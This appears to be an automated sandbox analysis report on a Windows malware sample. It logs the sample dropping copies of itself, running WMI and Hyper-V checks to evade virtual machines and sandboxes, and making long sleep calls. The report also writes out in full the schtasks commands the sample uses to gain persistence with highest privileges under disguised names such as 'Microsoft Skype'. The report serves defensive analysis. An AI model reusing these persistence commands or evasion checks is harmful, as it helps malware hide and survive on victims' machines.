Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002731000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2914742198.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: 1AD60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: 1AB70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: 1A730000 memory reserve \| memory write watch
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: 19C0000 memory reserve \| memory write watch
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: 1B3B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Memory allocated: 1AAC0000 memory reserve \| memory write watch
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: B00000 memory reserve \| memory write watch
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Window / User API: threadDelayed 9903

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe TID: 5524	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe TID: 5524	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe TID: 5524	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe TID: 5524	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe TID: 5524	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe TID: 6092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe TID: 5208	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Pictures\xdwdUpdate.exe TID: 6992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Pictures\xdwdUpdate.exe TID: 1980	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Hypervisor Logical Processor
Source: CVmkXJ7e0a.exe, 00000000.00000002.3679976357.000000001B878000.00000004.00000020.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3661503274.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: CVmkXJ7e0a.exe, 00000000.00000002.3661503274.0000000000D42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: CVmkXJ7e0a.exe, 00000000.00000002.3679976357.000000001B81C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus?
Source: CVmkXJ7e0a.exe, 00000000.00000002.3686036234.000000001E0DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: CVmkXJ7e0a.exe, 00000000.00000002.3679976357.000000001B878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus PipesundT
Source: CVmkXJ7e0a.exe, 00000000.00000002.3686036234.000000001E0FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: CVmkXJ7e0a.exe, 00000000.00000002.3681814321.000000001BD79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceC\[
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorP/
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: CVmkXJ7e0a.exe, 00000000.00000002.3683115460.000000001BF05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid PartitionN
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: CVmkXJ7e0a.exe, 00000000.00000002.3686036234.000000001E0DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration ServiceA.B
Source: CVmkXJ7e0a.exe, 00000000.00000002.3686036234.000000001E0DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes^7F
Source: CVmkXJ7e0a.exe, 00000000.00000002.3661503274.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipesn

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process token adjusted: Debug
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process token adjusted: Debug
Source: C:\Users\Public\Pictures\xdwdUpdate.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Skype" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\CVmkXJ7e0a.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Access Update" /tr "C:\Users\user\AppData\Roaming\xdwdpnsvr.exe" /RL HIGHEST & exit	Jump to behavior
